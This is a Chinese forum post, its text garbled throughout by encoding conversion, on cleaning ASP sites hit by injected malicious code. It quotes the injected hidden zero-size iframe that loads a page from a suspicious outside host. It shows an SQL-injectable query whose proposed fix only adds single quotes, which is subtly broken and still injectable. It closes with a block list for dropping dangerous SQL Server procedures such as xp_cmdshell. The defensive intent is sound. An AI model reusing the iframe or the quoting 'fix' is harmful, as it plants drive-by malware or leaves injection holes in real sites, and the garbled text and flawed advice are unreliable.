ASP網(wǎng)頁被插r入惡意代碼問題
這問題我遇見過。也在這里發(fā)過求救,最后總結(jié)是:
這總情況沒有什么軟件可以幫你修復(fù),必須靠自己一個(gè)文件一個(gè)文件的是檢查,看是不是程序上有漏動(dòng),決大多數(shù)是程序有漏動(dòng)。
比如: 在ASP里有這個(gè)一段話,
<%
ID=request("ID")
rs.open "select * from tmptabel where id=" & ID
%>
以上這句話非常容易成為入侵者下手的地方,必須加固一下
<%
ID=request("ID") 要設(shè)法檢查這個(gè)值,如不是數(shù)值就停用它,
rs.open "select * from tmptabel where id='" & ID & "'" 把這個(gè)值有單引號(hào)括上
%>
在檢查過所有文件確定程序里沒有這類SQL寫法的漏洞后。接下來就要全部替換掉所有頁面里的非法插入的<script type="text/javascript" src=">
<iframe src=http://www1.89382.cn/51.htm width=0 height=0></iframe>
這個(gè)東東,(可以用Macromedia Dreamweaver這類軟件對(duì)網(wǎng)站文件進(jìn)行檢查),或?qū)?nèi)部的網(wǎng)站把
最后是屏閉掉SQL的一個(gè)危險(xiǎn)存儲(chǔ)過程,如:
/*********************************************************************
以下列出的都是危險(xiǎn)的內(nèi)置存儲(chǔ)過程,全在我們封殺之列
xp_cmdshell
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
Xp_regwrite
sp_OAcreate
sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty
sp_OAGetErrorInfo
sp_OAStop
sp_makewebtask
/*********************************************************************
以下為屏蔽上面所說的危險(xiǎn)內(nèi)置存儲(chǔ)過程
sp_dropextendedproc 'xp_cmdshell'
go
sp_dropextendedproc 'xp_regaddmultistring'
go
sp_dropextendedproc 'xp_regdeletekey'
go
sp_dropextendedproc 'xp_regdeletevalue'
go
sp_dropextendedproc 'xp_regenumkeys'
go
sp_dropextendedproc 'xp_regenumvalues'
go
sp_dropextendedproc 'xp_regread'
go
sp_dropextendedproc 'xp_regremovemultistring'
go
sp_dropextendedproc 'xp_regwrite'
go
sp_dropextendedproc 'sp_OACreate'
go
sp_dropextendedproc 'sp_OADestroy'
go
sp_dropextendedproc 'sp_OAMethod'
go
sp_dropextendedproc 'sp_OAGetProperty'
go
sp_dropextendedproc 'sp_OASetProperty'
go
sp_dropextendedproc 'sp_OAGetErrorInfo'
go
sp_dropextendedproc 'sp_OAStop'
go
drop procedure sp_makewebtask